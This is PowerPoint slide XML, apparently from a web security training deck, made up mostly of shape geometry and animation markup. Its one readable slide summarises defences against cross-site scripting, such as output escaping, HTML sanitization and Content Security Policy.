                    <a:pt x="6378" y="10264"/>
                    <a:pt x="6199" y="10534"/>
                    <a:pt x="6087" y="10781"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5907" y="11185"/>
                    <a:pt x="5839" y="11590"/>
                    <a:pt x="5817" y="11904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5795" y="12218"/>
                    <a:pt x="5795" y="12488"/>
                    <a:pt x="5795" y="12668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5772" y="12892"/>
                    <a:pt x="5839" y="13094"/>
                    <a:pt x="5951" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2022" y="13273"/>
                    <a:pt x="1617" y="13656"/>
                    <a:pt x="1617" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="16733"/>
                    <a:pt x="2022" y="17429"/>
                    <a:pt x="2538" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="17429"/>
                    <a:pt x="2651" y="17429"/>
                    <a:pt x="2785" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2897" y="17429"/>
                    <a:pt x="3010" y="17563"/>
                    <a:pt x="3010" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18979"/>
                    <a:pt x="3055" y="19158"/>
                    <a:pt x="3100" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3481" y="20550"/>
                    <a:pt x="4222" y="21179"/>
                    <a:pt x="4851" y="21179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6244" y="21179"/>
                    <a:pt x="6985" y="20550"/>
                    <a:pt x="7209" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7412" y="19158"/>
                    <a:pt x="7434" y="18979"/>
                    <a:pt x="7434" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17563"/>
                    <a:pt x="7546" y="17429"/>
                    <a:pt x="7680" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8444" y="17429"/>
                    <a:pt x="8849" y="16575"/>
                    <a:pt x="8849" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="13656"/>
                    <a:pt x="8444" y="13273"/>
                    <a:pt x="7928" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7816" y="13139"/>
                    <a:pt x="7883" y="12959"/>
                    <a:pt x="7883" y="12780"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7905" y="12510"/>
                    <a:pt x="7905" y="12308"/>
                    <a:pt x="7905" y="12129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="11993"/>
                    <a:pt x="7928" y="11904"/>
                    <a:pt x="7951" y="11814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7995" y="11679"/>
                    <a:pt x="8017" y="11590"/>
                    <a:pt x="8107" y="11477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8220" y="11365"/>
                    <a:pt x="8377" y="11207"/>
                    <a:pt x="8714" y="11050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9231" y="10781"/>
                    <a:pt x="9432" y="10151"/>
                    <a:pt x="9163" y="9635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8894" y="9119"/>
                    <a:pt x="8265" y="8894"/>
                    <a:pt x="7748" y="9164"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10421" y="6266"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10421" y="6266"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10061" y="5727"/>
                    <a:pt x="9253" y="5547"/>
                    <a:pt x="8669" y="5884"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="9231"/>
                    <a:pt x="225" y="9949"/>
                    <a:pt x="607" y="10488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="854" y="10871"/>
                    <a:pt x="1303" y="11050"/>
                    <a:pt x="1752" y="11050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1752" y="11050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1932" y="11050"/>
                    <a:pt x="2134" y="11073"/>
                    <a:pt x="2291" y="11117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2426" y="11163"/>
                    <a:pt x="2538" y="11207"/>
                    <a:pt x="2628" y="11252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2763" y="11365"/>
                    <a:pt x="2875" y="11454"/>
                    <a:pt x="2987" y="11679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3077" y="11881"/>
                    <a:pt x="3167" y="12195"/>
                    <a:pt x="3167" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12039"/>
                    <a:pt x="5166" y="11454"/>
                    <a:pt x="4963" y="10938"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4829" y="10601"/>
                    <a:pt x="4627" y="10309"/>
                    <a:pt x="4424" y="10062"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10600" y="7502"/>
                    <a:pt x="10780" y="6805"/>
                    <a:pt x="10421" y="6266"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="7681"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="7681"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10376" y="4313"/>
                    <a:pt x="10556" y="3616"/>
                    <a:pt x="10196" y="3077"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9837" y="2516"/>
                    <a:pt x="9029" y="2358"/>
                    <a:pt x="8444" y="2672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="6042"/>
                    <a:pt x="0" y="6761"/>
                    <a:pt x="360" y="7300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="7839"/>
                    <a:pt x="1527" y="8018"/>
                    <a:pt x="2134" y="7681"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="4357"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="4357"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8153" y="1977"/>
                    <a:pt x="8355" y="1258"/>
                    <a:pt x="7995" y="719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7614" y="180"/>
                    <a:pt x="6827" y="0"/>
                    <a:pt x="6221" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="2740"/>
                    <a:pt x="0" y="3436"/>
                    <a:pt x="360" y="3976"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="4515"/>
                    <a:pt x="1527" y="4694"/>
                    <a:pt x="2134" y="4357"/>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1434092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Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="815845475"/>
      </p:ext>
    </p:extLst>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XSS Defense:  Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1526944"/>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What is Cross Site Scripting? (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2094147"/>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Output Escaping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2661350"/>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HTML Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3228553"/>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Safe JavaScript Sinks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3795756"/>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Sandboxing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4362957"/>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Safe JSON UI Usage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50C02447-3B9C-1C46-857D-F2A23FAF761E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4930158"/>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Content Security Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374319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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="2" presetClass="entr" presetSubtype="2"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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2"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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="60" presetID="2" presetClass="entr" presetSubtype="2"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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="6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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="71" presetID="2" presetClass="entr" presetSubtype="2"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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
